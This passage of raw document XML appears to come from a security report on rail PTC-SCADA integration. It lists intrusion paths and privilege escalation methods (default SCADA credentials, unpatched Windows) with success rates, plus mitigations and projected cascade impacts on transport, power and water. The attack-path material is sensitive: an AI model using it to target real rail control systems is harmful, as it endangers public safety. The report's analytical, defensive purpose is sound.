          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:cs="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Vendor access → Maintenance laptop → Direct PTC connection (21%)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:cs="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cloud services → Hybrid connector → On-premise SCADA → PTC (12%)</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1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Privilege Escalation Methods</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>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3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploiting unpatched Windows vulnerabilities (83% success)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000114">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Default SCADA credentials (71% success)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000115">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Service account compromise (64% success)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000116">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Database privilege abuse (58% success)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000117">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_2ya8hpz08rk7" w:id="19"/>
      <w:bookmarkEnd w:id="19"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Lessons from Integration Failures</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000118">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_4do2hmz541k5" w:id="20"/>
      <w:bookmarkEnd w:id="20"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Common Architecture Mistakes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000119">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Analysis reveals systematic design flaws </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref47">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[47]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>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7"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Business Pressure</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: PTC deadline drove security shortcuts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Vendor Silos</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: SCADA and PTC vendors didn't coordinate security</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Legacy Burden</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: 20+ year old SCADA systems retrofitted</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Compliance Focus</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Met FRA requirements, ignored security</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011F">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_oo2dzo1ptfzj" w:id="21"/>
      <w:bookmarkEnd w:id="21"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Successful Mitigations (Limited)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000120">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Few organizations have properly secured integrations </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref48">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[48]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>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7"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Canadian Pacific</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Implemented data diodes (partial)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000123">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Metrolink</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Deployed separate PTC network (costly)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000124">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Short Line Railroad Consortium</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Shared SOC model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rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ps26aszdg0zn" w:id="22"/>
      <w:bookmarkEnd w:id="22"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cross-Sector Impact Assessment</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000128">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_msljj8tkcnd" w:id="23"/>
      <w:bookmarkEnd w:id="23"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Multi-Modal Transportation Cascade</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000129">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PTC-SCADA compromise triggers cascading failures across all transportation modes </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref49">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[49]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012A">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_5jo67tpi7g37" w:id="24"/>
      <w:bookmarkEnd w:id="24"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Rail Network Paralysis (0-2 hours)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b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">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b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Consequence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b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Economic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rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b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b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Freight Halt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140,000 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Supply chain freeze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$2B/hour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hyperlink w:anchor="ref50">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[50]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b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Passenger Chaos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21,400 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4.6M stranded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$500M/hour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hyperlink w:anchor="ref51">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[51]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rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Hazmat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1,800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Potential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Incalculable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hyperlink w:anchor="ref52">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[52]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b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Port Backup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10 major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Container overflow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$1.2B/day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hyperlink w:anchor="ref53">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[53]</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000144">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_99v7fd5z3txo" w:id="25"/>
      <w:bookmarkEnd w:id="25"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Critical Resource Disruption (2-24 hours)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000145">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Power Plants</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: 63 facilities lose coal delivery within 24 hours </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref54">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[54]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000146">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Refineries</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: 43% capacity impacted by crude delivery halt </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref55">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[55]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000147">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Chemical Plants</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Chlorine/ammonia shortages begin </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref56">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[56]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000148">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Food Distribution</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Refrigerated goods spoilage starts </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref57">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[57]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000149">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_yfmq3ymmd4ur" w:id="26"/>
      <w:bookmarkEnd w:id="26"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Infrastructure Collapse (24-72 hours)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Water Systems</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: 3,300 plants ration treatment chemicals </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref58">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[58]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Healthcare</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Medical supply deliveries cease </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref59">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[59]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Agriculture</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Fertilizer shortage impacts 180M acres </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref60">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[60]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Military</w:t>
